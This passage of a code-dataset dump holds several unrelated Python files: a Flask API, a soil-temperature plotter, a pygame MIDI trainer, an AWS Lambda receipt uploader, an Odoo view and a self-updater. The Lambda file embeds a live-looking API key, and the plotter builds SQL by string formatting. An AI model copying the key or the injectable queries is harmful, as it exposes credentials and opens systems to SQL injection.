\"compiler_vars\" ='+json.dumps(cv))\n ck.out(' Input \"cpu_freq\" ='+cpu_freq)\n ck.out(' Input \"gpu_freq\" ='+gpu_freq)\n ck.out(' Original CMD ='+cmd)\n ck.out('')\n\n cflags=''\n for c in cf:\n cx='##compiler_flags#'+c\n cc=cf[c]\n if cc!='':\n if cflags!='': cflags+=' '\n cflags+=str(cc)\n\n cmd=cmd.replace('$#cflags#$', cflags)\n\n cmd=cmd.replace('$#cpu_freq#$', cpu_freq)\n cmd=cmd.replace('$#gpu_freq#$', gpu_freq)\n\n for q in cv:\n qq=cv[q]\n cmd=cmd.replace('$#'+q+'#$', str(qq)) \n\n if o=='con':\n ck.out('Prepared CMD:')\n ck.out('')\n ck.out(cmd)\n\n ck.out('')\n ck.out('Executing:')\n ck.out('')\n\n lcmd=cmd.split('\\n')\n for l in lcmd:\n os.system(l.strip())\n\n return {'return':0}\n","sub_path":"module/pipeline.cmd/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"233775732","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/soynlp/postagger/tagset/soy.py\n# Compiled at: 2018-04-10 05:49:44\n# Size of source mod 2**32: 276 bytes\ntagset = {'Noun':'명사', \n 'Pronoun':'대명사', \n 'Numeral':'수사', \n 'Verb':'동사', \n 'Adjective':'형용사', \n 'Determiner':'관형사', \n 'Adverb':'부사', \n 'Exclamation':'감탄사', \n 'Josa':'조사', \n 'Symbol':'기호'}","sub_path":"pycfiles/soynlp-0.0.493-py3.7/soy.cpython-37.py","file_name":"soy.cpython-37.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377581500","text":"#!/usr/local/bin/python3\n\nfrom flask import Flask, jsonify\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\n\ndef home():\n print('Minha nossa!')\n #return 'Você acessou esta magnifica API'\n #return jsonify({'status' : 'Running...'})\n return json.dumps({'status' : 'Running...'})\n\napp.run(host='0.0.0.0', debug=True)\n","sub_path":"02_app.py","file_name":"02_app.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"105440223","text":"\"\"\"4 inch soil temps\"\"\"\nimport datetime\nimport calendar\n\nfrom pyiem import util\nfrom pyiem.network import Table as NetworkTable\nfrom pyiem.datatypes import temperature\n\nXREF = {\n 'AEEI4': 'A130209',\n 'BOOI4': 'A130209',\n 'CAMI4': 'A138019',\n 'CHAI4': 'A131559',\n 'CIRI4': 'A131329',\n 'CNAI4': 'A131299',\n 'CRFI4': 'A131909',\n 'DONI4': 'A138019',\n 'FRUI4': 'A135849',\n 'GREI4': 'A134759',\n 'KNAI4': 'A134309',\n 'NASI4': 'A135879',\n 'NWLI4': 'A138019',\n 'OKLI4': 'A134759',\n 'SBEI4': 'A138019',\n 'WMNI4': 'A135849',\n 'WTPI4': 'A135849'}\n\n\ndef get_description():\n \"\"\" Return a dict describing how to call this plotter \"\"\"\n desc = dict()\n desc['description'] = \"\"\"This chart presents daily timeseries of 4 inch\n soil temperatures.\"\"\"\n today = datetime.date.today()\n desc['arguments'] = [\n dict(type='networkselect', name='station', network='ISUSM',\n default='BOOI4', label='Select Station:'),\n dict(type='year', default=today.year, min=1988, name='year',\n label='Year to Highlight')\n ]\n return desc\n\n\ndef plotter(fdict):\n \"\"\" Go \"\"\"\n import matplotlib\n matplotlib.use('agg')\n import matplotlib.pyplot as plt\n pgconn = util.get_dbconn('isuag')\n cursor = pgconn.cursor()\n\n today = datetime.date.today()\n nt = NetworkTable(\"ISUSM\")\n oldnt = NetworkTable(\"ISUAG\")\n ctx = util.get_autoplot_context(fdict, get_description())\n station = ctx['station']\n year = ctx['year']\n _ = nt.sts[station]\n oldstation = XREF.get(station, 'A130209')\n\n (fig, ax) = plt.subplots()\n climo = []\n cdays = []\n cursor.execute(\"\"\"\n SELECT extract(doy from valid) as d, avg(c30)\n from daily where station = %s GROUP by d ORDER by d ASC\n \"\"\", (oldstation, ))\n for row in cursor:\n climo.append(row[1])\n cdays.append(row[0])\n\n for yr in range(1988, today.year + 1):\n if yr in [1988, 1997]:\n continue\n x = []\n y = []\n if yr < 2014:\n units = 'F'\n cursor.execute(\"\"\"\n select valid, c30\n from daily WHERE station = '%s'\n and valid >= '%s-01-01' and valid < '%s-01-01' ORDER by valid ASC\n \"\"\" % (oldstation, yr, yr+1))\n else:\n units = 'C'\n cursor.execute(\"\"\"\n SELECT valid, tsoil_c_avg_qc from sm_daily WHERE\n station = '%s' and valid >='%s-01-01' and\n valid < '%s-01-01' and tsoil_c_avg_qc is not null\n ORDER by valid ASC\"\"\" % (station, yr, yr+1))\n for row in cursor:\n x.append(int(row[0].strftime(\"%j\")) + 1)\n y.append(temperature(row[1], units).value('F'))\n color = 'skyblue'\n if yr == year:\n color = 'r'\n ax.plot(x, y, color=color, label='%s' % (year,), lw=2, zorder=3)\n else:\n ax.plot(x, y, color=color, zorder=2)\n\n ax.plot(cdays, climo, color='k', label='Average')\n\n ax.set_title((\"ISU AgClimate [%s] %s \\n\"\n \"Site 4 inch Soil Temperature Yearly Timeseries\"\n ) % (station, nt.sts[station]['name']))\n ax.set_xlabel((\"* pre-2014 data provided by [%s] %s\"\n ) % (oldstation, oldnt.sts[oldstation]['name']))\n ax.grid(True)\n ax.set_ylabel('Daily Avg Temp $^{\\circ}\\mathrm{F}$')\n ax.set_xticks((1, 32, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 365))\n ax.set_xticklabels(calendar.month_abbr[1:])\n ax.set_xlim(0, 367)\n ax.set_ylim(-10, 90)\n ax.axhline(32, lw=2, color='purple', zorder=4)\n ax.set_yticks(range(-10, 90, 20))\n ax.legend(loc='best')\n\n return fig\n\n\nif __name__ == '__main__':\n plotter(dict())\n","sub_path":"htdocs/plotting/auto/scripts100/p145.py","file_name":"p145.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336315074","text":"__author__ = 'shawn'\n\nimport pygame, sys\nimport time\nfrom random import randint\nimport mido\nfrom threading import Thread\nfrom midi import logic\nfrom mido.midifiles import *\n\n\nclass PlayToContinue:\n def __init__(self):\n self.__states = {\"menu\": 0, \"play\": 1, \"playBack\": 2}\n self.__state = self.__states[\"menu\"]\n self.__bpm = 0\n self.__notes = []\n self.__loading = 0\n self.__note_start_time = 0\n self.__current_note_to_play = 0\n self.__recording = False\n self.__playing_game = False\n self.__of_name = \"\"\n\n self.__done = False\n self.__key_mod_size = logic.get_length_notes()\n\n pygame.init()\n pygame.mixer.init(44100, -16, 2, 1024)\n self.__screen = pygame.display.set_mode((640, 480))\n self.__clock = pygame.time.Clock()\n\n self.__note_font = pygame.font.Font(None, 148)\n self.__info_font = pygame.font.Font(None, 28)\n\n self.__display_center_message = self.__note_font.render(\"\", True, (0, 0, 0))\n self.commands = [\n self.__info_font.render(\"Press esc to quit\", True,(205, 92, 92)),\n self.__info_font.render(\"Press s to start\", True,(205, 92, 92)),\n self.__info_font.render(\"Press p to play back sound \", True,(205, 92, 92))]\n\n def start(self, bpm, note_file_name, out_file_name):\n self.__of_name = out_file_name\n self.__read_note_file(note_file_name)\n self.__bpm = bpm\n if not self.__screen: raise NotImplementedError(\"Class Not Initilized.\")\n self.__display_bpm = self.__info_font.render(\"bpm: \" + str(self.__bpm), True,(205, 92, 92))\n while not self.__done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.__done = True\n self.__set_and_update_center_message(\"hit any note\")\n continue\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n if self.__state == self.__states[\"menu\"]:\n self.__done = True\n self.__set_and_update_center_message(\"hit any note\")\n continue\n elif self.__state == self.__states[\"play\"]:\n self.__display_center_message = self.__note_font.render(\"\", True, (0, 0, 0))\n self.__state = self.__states[\"menu\"]\n if self.__state == self.__states[\"menu\"]:\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n self.__state = self.__states[\"play\"]\n self.__playing_game = True\n self.__loading = time.time()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_p:\n self.__state = self.__states[\"playBack\"]\n self.__loading = time.time()\n self.__playing_game = True\n\n if self.__state == self.__states[\"play\"]:\n self.__play_screen()\n if self.__state == self.__states[\"menu\"]:\n self.__menu_screen()\n if self.__state == self.__states[\"playBack\"]:\n self.__playback_screen()\n pygame.display.flip()\n self.__clock.tick(60)\n\n def __playback_screen(self):\n if not self.__playing_game:\n self.__state = self.__states[\"menu\"]\n return\n self.__screen.fill((255, 255, 255))\n if time.time() - self.__loading < 3:\n self.__set_and_update_center_message(\"Starting In: \" + str(round(3 - (time.time() - self.__loading))))\n self.__note_start_time = time.time()\n else:\n if not self.__recording:\n self.__play_music_from_file('new_song.mid')\n self.__recording = True\n self.__new_note()\n\n def __display_menu_commands(self):\n spacing = 2\n for key, command in enumerate(self.commands):\n self.__screen.blit(command, (2, spacing))\n spacing += command.get_height() + 2\n\n def __set_and_update_center_message(self, message):\n self.__display_center_message = self.__note_font.render(message, True, (0, 0, 0))\n self.__screen.blit(self.__display_center_message,\n (320 - self.__display_center_message.get_width() // 2, 240 - self.__display_center_message.get_height() // 2))\n\n def __menu_screen(self):\n self.__screen.fill((255, 255, 255))\n self.__screen.blit(self.__display_bpm, (self.__screen.get_width() - self.__display_bpm.get_width() - 2, 2))\n self.__set_and_update_center_message(\"Main Menu\")\n self.__display_menu_commands()\n self.__screen.blit(self.__display_center_message,\n (320 - self.__display_center_message.get_width() // 2, 240 - self.__display_center_message.get_height() // 2))\n\n def __play_screen(self):\n self.__screen.fill((255, 255, 255))\n if time.time() - self.__loading < 3:\n self.__set_and_update_center_message(\"Starting In: \" + str(round(3 - (time.time() - self.__loading))))\n self.__note_start_time = time.time()\n else:\n if not self.__recording and self.__playing_game:\n Thread(target=self.__start_midi_thread).start()\n print(\"recording Started\")\n self.__recording = True\n if not self.__playing_game:\n self.__play_end()\n else:\n self.__new_note()\n\n def __play_end(self):\n self.__set_and_update_center_message(\"hit any note\")\n if not self.__recording:\n self.__state = self.__states[\"menu\"]\n\n def __new_note(self):\n self.__set_and_update_center_message(self.__notes[0][self.__current_note_to_play])\n end_time = self.__bpm/60 * int(self.__notes[1][self.__current_note_to_play])\n\n self.__display_bpm = self.__info_font.render(\"New Note In: \" + str(round(end_time - (time.time() - self.__note_start_time))), True,(205, 92, 92))\n self.__screen.blit(self.__display_bpm, (self.__screen.get_width() - self.__display_bpm.get_width() - 2, 2))\n\n if time.time() - self.__note_start_time > end_time:\n self.__current_note_to_play += 1\n self.__note_start_time = time.time()\n if self.__current_note_to_play == len(self.__notes[0]):\n self.__current_note_to_play = 0\n self.__playing_game = False\n self.__display_bpm = self.__info_font.render(\"bpm: \" + str(self.__bpm), True,(205, 92, 92))\n\n def __start_midi_thread(self):\n last_note = int(round(time.time() * 1000))\n with MidiFile() as mid:\n track = MidiTrack()\n print(\"Waiting For Keyboard Input ... \")\n with mido.open_input() as inport:\n for msg in inport:\n if self.__done or not self.__playing_game:\n self.__recording = False\n mid.tracks.append(track)\n mid.save(self.__of_name)\n print(\"File Saved!\")\n print(\"File Location: \" + self.__of_name)\n self.__recording = False\n return\n now = int(round(time.time() * 1000))\n msg.time = now - last_note\n last_note = now\n if hasattr(msg, 'velocity') and msg.velocity == 0:\n msg = Message('note_off', note=msg.note, velocity=msg.velocity, time=msg.time)\n track.append(msg)\n\n def __read_note_file(self, file_name):\n\n beats = []\n notes = []\n with open(file_name) as fp:\n for line in fp:\n line = line.rstrip()\n beat,note = line.split(\" \")\n beats.append(beat)\n notes.append(note)\n self.__notes = [notes,beats]\n\n def __play_music_from_file(self, music_file):\n pygame.mixer.music.set_volume(0.8)\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"\\nMusic file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()) )\n return\n pygame.mixer.music.play()\n","sub_path":"pythonCode/games/lib/training_program.py","file_name":"training_program.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529579071","text":"import time\n\nclass Combos:\n count = 1\n\n def find_combos(self, int_list, above_str):\n for i in range(0, len(int_list)):\n cur_combo = above_str + str(int_list[i])\n\n temp_list = list(int_list)\n temp_list.pop(i)\n\n if len(temp_list) != 0:\n self.find_combos(temp_list, cur_combo)\n else:\n print(str(self.count) + \": \" + str(cur_combo))\n self.count = self.count + 1\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n\n combos = Combos()\n combos.find_combos([1,2,3,4,5,6,7,8], \"\")\n\n end_time = time.time()\n print(\"Elapsed time was %g seconds\" % (end_time - start_time))\n","sub_path":"class Combos time.py","file_name":"class Combos time.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185609445","text":"import base64\nimport boto3\nimport boto3.session\nimport json\nimport pytz\nimport requests\nimport time\nimport uuid\n\nfrom datetime import datetime\nfrom pytz import timezone\nfrom tallyclient import TallyClient\n\nsession = boto3.session.Session(region_name='us-west-1')\ns3client = session.client('s3', config=boto3.session.Config(signature_version='s3v4'))\n\nclient = TallyClient(\"piper.phizzle.space\")\n\n\ndef lambda_handler(event, context):\n start_time = time.time()\n print(\"body length: %d\" % len(event['body']))\n print(\"first part of string: %s\" % event['body'][:100])\n\n current_date = datetime.now().replace(tzinfo=pytz.UTC)\n date_string = current_date.astimezone(timezone('US/Pacific')).strftime(\"%b-%y\")\n\n s3_key = \"%s/%s.pdf\" % (date_string.lower(), uuid.uuid4())\n\n s3client.put_object(\n Body=base64.b64decode(event['body']),\n Bucket='auto-receipts-storage',\n ContentType='application/pdf',\n Key=s3_key\n )\n\n headers = {'x-api-key': 'oZ67x41VBhaSJ6kPX40BhaqhiDcx9DYC9AZHFX3L'}\n response = requests.post('https://o0ocplke2d.execute-api.us-east-1.amazonaws.com/prod/generate-record',\n data=json.dumps({'s3_key': s3_key}), headers=headers)\n\n if response.status_code >= 300:\n print(response.status_code)\n end_time = time.time()\n client.gauge('piper.receiptReceiver.responseTime', int((end_time-start_time) * 1000))\n client.count('piper.receiptReceiver.%s' % response.status_code)\n raise BaseException(\"Could not generate record for receipt.\")\n\n end_time = time.time()\n client.gauge('piper.receiptReceiver.responseTime', int((end_time-start_time) * 1000))\n client.count('piper.receiptReceiver.200')\n return {\n 'statusCode': 200,\n 'headers': {},\n 'body': 'this is a really neat test'\n }\n","sub_path":"lambda/receiptReceiver/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"145690430","text":"import cv2\n\ndef face_detect(file_name, cascade_name):\n img = cv2.imread(file_name) # 读取图片\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 图片灰度化\n img_gray = cv2.equalizeHist(img_gray) # 直方图均衡化\n face_cascade = cv2.CascadeClassifier(cascade_name) # 加载级联分类器\n faces = face_cascade.detectMultiScale(img) # 多尺度检测\n for (x, y, w, h) in faces: # 遍历所有检测到的动漫脸\n img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 255), 5) # 绘制矩形框\n cv2.imshow('Face detection', img) # 检测效果预览\n cv2.waitKey(0) # 保持窗口显示\n\nif __name__ == \"__main__\":\n face_detect('img/anime/test_1.jpg', 'data/lbpcascades/anime/lbpcascade_animeface.xml')","sub_path":"anime_face_detect.py","file_name":"anime_face_detect.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"434851765","text":"from openerp.osv import fields,osv\nfrom openerp import tools\n \nclass account_invoice_parent(osv.osv):\n _name = \"account.invoice.parent\"\n _auto = False\n _columns = {\n 'origin': fields.char('Source Document', size=64),\n 'date_invoice': fields.date('Invoice Date'),\n 'date_due': fields.date('Due Date'),\n\t'partner_id': fields.many2one('res.partner', string='Customer'),\n 'amount_total': fields.float('Total'),\n 'amount_tax': fields.float('Tax'),\n 'state': fields.selection([\n ('draft','Draft'),\n ('proforma','Pro-forma'),\n ('proforma2','Pro-forma'),\n ('open','Open'),\n ('paid','Paid'),\n ('cancel','Cancelled'),\n ], 'Status'),\n 'amount_untaxed': fields.float('Subtotal'),\n 'type': fields.selection([\n ('out_invoice','Customer Invoice'),\n ('in_invoice','Supplier Invoice'),\n ('out_refund','Customer Refund'),\n ('in_refund','Supplier Refund'),\n ],'Type', readonly=True, select=True, change_default=True, track_visibility='always'),\n 'fiscal_position': fields.many2one('account.fiscal.position', 'Fiscal Position'),\n 'journal_id': fields.many2one('account.journal', 'Journal'),\n 'account_id': fields.many2one('account.account', 'Account'),\n 'sent': fields.boolean('Sent'),\n\t'residual': fields.float('Balance'),\n 'reconciled': fields.boolean('Paid/Reconciled'),\n 'payment_term': fields.many2one('account.payment.term', 'Payment Terms'),\n 'comment': fields.text('Additional Information'),\n 'invoice_line': fields.one2many('account.invoice.line', 'invoice_id', 'Invoice Lines'),\n 'move_id': fields.many2one('account.move', 'Journal Entry', select=1),\n 'number': fields.related('move_id','name', type='char', size=64, relation='account.move' ,string='Number'),\n\t'parent':fields.integer('Parent'),\n }\n \n def init(self, cr):\n tools.sql.drop_view_if_exists(cr, 'account_invoice_parent')\n cr.execute(\"\"\"\n CREATE OR REPLACE VIEW account_invoice_parent AS (\n select a.*,pa.name as parent, p.apoderado_admon, p.apoderado_aca\n from op_student op\n join op_parent_student_rel ps on ps.op_parent_id=op.id\n join op_parent pa on pa.id=ps.op_student_id \n join res_partner p on p.id=pa.name\n join sale_order s on s.partner_id=op.partner_id\n join sale_order_invoice_rel sa on sa.order_id=s.id\n join account_invoice a on a.id=sa.invoice_id\n\t where p.apoderado_admon=TRUE\n\t )\n \"\"\")\n \naccount_invoice_parent()\n\n","sub_path":"facturacion/account_invoice_parent.py","file_name":"account_invoice_parent.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"471078019","text":"from flask import Flask, request, render_template, redirect, url_for, abort, flash, jsonify\nfrom points.results_table import ResultsTable\nfrom points.seasons import Seasons\n\n# create web application\napp = Flask(__name__, static_folder='webapp/static', template_folder='webapp/templates')\napp.config.from_envvar('WEBAPP_SETTINGS')\n\n\n@app.route('/championship/')\ndef championship(championship_id):\n table = ResultsTable('http://organisation.mylaps.com/championship/view.jsp?id=' + str(championship_id))\n return render_template(\"championship.html\", table=table)\n\n@app.route('/', defaults={'selected_season': None})\n@app.route('/')\ndef main_page(selected_season):\n # load sanzaru page with the list of all sessions for each seasons\n seasons = Seasons('http://www.mylaps.com/api/eventchampionships?id=' + str(118059))\n\n season_years = seasons.get_season_years()\n if selected_season is None:\n selected_season = season_years[0]\n\n season_data = seasons.get_season_data_by_year(selected_season)\n\n return render_template(\"main.html\", season_data=season_data, season_years=season_years, selected_season=selected_season)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=4567, threaded=True)\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"421455772","text":"from urllib.request import urlretrieve\nfrom urllib.request import urlopen\nfrom urllib.error import URLError\n\nversion_main = 15\nversion_database = 4\nversion_download_update = 5\nversion_input_wait = 2\nlist_update = []\n\n\ndef update_check():\n no_updates = True\n no_internet = False\n try:\n check_version = urlopen(\"https://raw.githubusercontent.com/LescautManon/Manon/master/update.txt\").read()\n except URLError:\n no_internet = True\n print(\"Нет подключения к интернету\")\n return no_updates, no_internet\n check_version = check_version.decode('utf-8')\n check_version = check_version.split(\"\\n\")\n for i in check_version:\n if i.isdigit():\n list_update.append(int(i))\n if (list_update[0] > version_main\n or list_update[1] > version_database\n or list_update[2] > version_download_update\n or list_update[3] > version_input_wait):\n no_updates = False\n return no_updates, no_internet\n else:\n no_updates = True\n print(\"Обновлений нет\")\n return no_updates, no_internet\n\n\ndef update():\n update_main = False\n update_download = False\n counter_updates = 0\n if len(list_update) == 0:\n print(\"Нет подключения к интернету\")\n return update_main, update_download\n else:\n import re\n if list_update[0] > version_main:\n url = 'https://raw.githubusercontent.com/LescautManon/Manon/master/main.py'\n filename = \"main.py\"\n urlretrieve(url, filename)\n print('update main.py OK')\n old_version = version_main\n new_version = list_update[0]\n data = open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_main = {old_version}\", f\"version_main = {new_version}\", data))\n o.close()\n counter_updates += 1\n update_main = True\n if list_update[1] > version_database:\n url = 'https://github.com/LescautManon/Manon/raw/master/mydatabase.db'\n filename = \"mydatabase.db\"\n urlretrieve(url, filename)\n print('update mydatabase.db OK')\n old_version = version_database\n new_version = list_update[1]\n data = open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_database = {old_version}\", f\"version_database = {new_version}\", data))\n o.close()\n counter_updates += 1\n if list_update[2] > version_download_update:\n url = 'https://raw.githubusercontent.com/LescautManon/Manon/master/download_update.py'\n filename = \"download_update.py\"\n urlretrieve(url, filename)\n print('update download_update.py OK')\n old_version = version_download_update\n new_version = list_update[2]\n data = open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_download_update = {old_version}\", f\"version_download_update = {new_version}\", data))\n o.close()\n counter_updates += 1\n update_download = True\n if list_update[3] > version_input_wait:\n url = 'https://raw.githubusercontent.com/LescautManon/Manon/master/input_wait.py'\n filename = \"input_wait.py\"\n urlretrieve(url, filename)\n print('update input_wait.py OK')\n old_version = version_input_wait\n new_version = list_update[3]\n data = open('download_update.py').read()\n o = open('download_update.py', 'w')\n o.write(re.sub(f\"version_input_wait = {old_version}\", f\"version_input_wait = {new_version}\", data))\n o.close()\n counter_updates += 1\n update_download = True\n if counter_updates == 0:\n print(\"Обновлений нет\")\n return update_main, update_download\n else:\n print(\"Обновление завершено. Для продолжения нажми enter\")\n return update_main, update_download\n","sub_path":"download_update.py","file_name":"download_update.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490837211","text":"from qgis.PyQt.QtWidgets import qApp\nfrom qgis.PyQt.QtCore import QMetaObject, QObject, QSettings, QThread, Qt, pyqtSlot\nimport traceback, platform, os, uuid\nfrom qgis.PyQt.QtCore import QCoreApplication, QLocale, QThread\nfrom qgis.PyQt.QtWidgets import QPushButton, QApplication\nfrom qgis.core import Qgis, QgsMessageLog, qgsfunction, QgsMessageOutput\nfrom qgis.gui import QgsMessageBar\nfrom qgis.utils import iface, plugins\nfrom configparser import ConfigParser\nimport datetime\nimport os\nimport sys\nimport traceback\nimport glob\nimport os.path\nimport warnings\nimport codecs\nimport time\nimport functools\n\nfrom .postgresql import Postgresql\n\nclass ErroHandler(object):\n\n @staticmethod\n def show_message_log(pop_error=True):\n if pop_error:\n iface.messageBar().popWidget()\n\n iface.openMessageLog()\n\n @staticmethod\n def open_stack_dialog(etype, value, tb, msg, pop_error=True):\n if pop_error and iface is not None:\n iface.messageBar().popWidget()\n\n if msg is None:\n msg = QCoreApplication.translate('Python', 'An error has occurred while executing Python code:')\n\n # TODO Move this to a template HTML file\n txt = u'''{msg}\n
\n

{main_error}

\n
\n        {error}\n        
\n
\n {version_label} {num}\n
\n {qgis_label} {qversion} {qgisrelease}, {devversion}\n
\n

{pypath_label}

\n
    \n {pypath}\n
'''\n\n error = ''\n lst = traceback.format_exception(etype, value, tb)\n for s in lst:\n error += s.decode('utf-8', 'replace') if hasattr(s, 'decode') else s\n error = error.replace('\\n', '
')\n\n main_error = lst[-1].decode('utf-8', 'replace') if hasattr(lst[-1], 'decode') else lst[-1]\n\n version_label = QCoreApplication.translate('Python', 'Python version:')\n qgis_label = QCoreApplication.translate('Python', 'QGIS version:')\n pypath_label = QCoreApplication.translate('Python', 'Python Path:')\n txt = txt.format(msg=msg,\n main_error=main_error,\n error=error,\n version_label=version_label,\n num=sys.version,\n qgis_label=qgis_label,\n qversion=Qgis.QGIS_VERSION,\n qgisrelease=Qgis.QGIS_RELEASE_NAME,\n devversion=Qgis.QGIS_DEV_VERSION,\n pypath_label=pypath_label,\n pypath=u\"\".join(u\"
  • {}
  • \".format(path) for path in sys.path))\n\n txt = txt.replace(' ', '  ') # preserve whitespaces for nicer output\n\n dlg = QgsMessageOutput.createMessageOutput()\n dlg.setTitle(msg)\n dlg.setMessage(txt, QgsMessageOutput.MessageHtml)\n dlg.showMessage()\n\n @staticmethod\n def _showException(etype, value, tb, msg, messagebar=False):\n if msg is None:\n msg = 'An error has occurred while executing Python code:'\n\n logmessage = ''\n for s in traceback.format_exception(etype, value, tb):\n logmessage += s.decode('utf-8', 'replace') if hasattr(s, 'decode') else s\n\n title = 'Python error'\n QgsMessageLog.logMessage(logmessage, title)\n\n try:\n blockingdialog = QApplication.instance().activeModalWidget()\n window = QApplication.instance().activeWindow()\n except:\n blockingdialog = QApplication.activeModalWidget()\n window = QApplication.activeWindow()\n\n # Still show the normal blocking dialog in this case for now.\n if blockingdialog or not window or not messagebar or not iface:\n ErroHandler.open_stack_dialog(etype, value, tb, msg)\n return\n\n bar = iface.messageBar() if iface else None\n\n # If it's not the main window see if we can find a message bar to report the error in\n if not window.objectName() == \"QgisApp\":\n widgets = window.findChildren(QgsMessageBar)\n if widgets:\n # Grab the first message bar for now\n bar = widgets[0]\n\n item = bar.currentItem()\n if item and item.property(\"Error\") == msg:\n # Return of we already have a message with the same error message\n return\n\n widget = bar.createMessage(title, msg + \" \" + \"See message log (Python Error) for more details.\")\n widget.setProperty(\"Error\", msg)\n stackbutton = QPushButton(\"Stack trace\", pressed=functools.partial(ErroHandler.open_stack_dialog, etype, value, tb, msg))\n button = QPushButton(\"View message log\", pressed=ErroHandler.show_message_log)\n widget.layout().addWidget(stackbutton)\n widget.layout().addWidget(button)\n bar.pushWidget(widget, Qgis.Warning)\n\n @staticmethod\n def get_plugins_versions():\n plugins_versions = ''\n for name, plugin in plugins.items():\n try:\n metadata_path = os.path.join(\n plugin.plugin_dir,\n 'metadata.txt'\n )\n with open(metadata_path) as mf:\n cp = ConfigParser()\n cp.readfp(mf)\n plugins_versions += \"{0} : {1}\\n\".format(name, cp.get('general', 'version'))\n except:\n pass\n return plugins_versions\n\n @staticmethod\n def showException(etype, value, tb, msg, *args, **kwargs):\n erro_type = etype.__name__\n description = ''\n for s in traceback.format_exception(etype, value, tb):\n description += s\n description += \"{}\\n\".format(value)\n if platform.system() == 'Linux':\n user = os.environ['USER'] \n else:\n user = os.environ['USERNAME'] \n mac = ':'.join(['{:02x}'.format((uuid.getnode() >> d) & 0xff) for d in range(0,8*6,8)][::-1]).upper()\n qgis_version = Qgis.QGIS_VERSION\n operational_system = platform.platform()\n current_timestamp = datetime.datetime.now()\n plugins_versions = ErroHandler.get_plugins_versions()\n Postgresql().save_erro(\n mac, \n user, \n current_timestamp, \n erro_type, \n description, \n qgis_version, \n operational_system, \n plugins_versions\n )\n ErroHandler._showException(etype, value, tb, msg, True)\n\n \n \n ","sub_path":"erroHandler.py","file_name":"erroHandler.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"481177577","text":"import pygame\n\n#制作游戏的窗口\ndef main():\n #初始化导入的pygame模块\n pygame.init()\n #设置窗口的尺寸\n screen = pygame.display.set_mode((800,600))\n #设置当前窗口的标题\n pygame.display.set_caption(\"打球吃小球\")\n running = True\n #开启一个事件循环 处理发生的事情\n while running:\n #从消息队列中获取事件对事件进行处理\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\nif __name__ == '__main__':\n main()","sub_path":"Day10/GUI/Pygame.py","file_name":"Pygame.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"652397168","text":"#! python\n\nimport time\nimport itertools\nimport math\nimport euler\nfrom decimal import *\n\ndef main():\n getcontext().prec = 150\n N = 101\n num_digits = 100\n power = Decimal(0.5)\n\n total_sum = 0\n for n in range(1, N):\n if not euler.is_square_number(n):\n d = Decimal(n)\n root = d ** power\n digital_sum = euler.digital_sum(root, num_digits)\n print(str(n) + ' : ' + str(digital_sum))\n total_sum += digital_sum\n print(total_sum)\n\nif __name__ == \"__main__\":\n start = time.time()\n main()\n print('RUNTIME: ', time.time() - start, 's')","sub_path":"p80.py","file_name":"p80.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"599312579","text":"from django.shortcuts import render, get_object_or_404\nfrom shop.models import Kategory, Product\nfrom cart.forms import CartAddProductForm\n\ndef ProductList(request, category_slug=None):\n category = None\n categories = Kategory.objects.all()\n products = Product.objects.filter(available=True)\n if category_slug:\n category = get_object_or_404(Kategory, short_desc=category_slug)\n products = products.filter(category=Product.kategory)\n return render(request, 'shop/product/list.html', {\n 'category': category,\n 'categories': categories,\n 'products': products,\n 